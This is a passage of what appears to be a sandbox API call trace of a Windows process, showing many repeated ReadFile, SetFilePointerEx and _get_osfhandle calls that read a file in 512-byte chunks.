lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.234] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.234] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.235] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.236] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, 
lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.237] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.237] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.237] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.238] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.238] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.238] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 
[0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, 
lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 
[0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, 
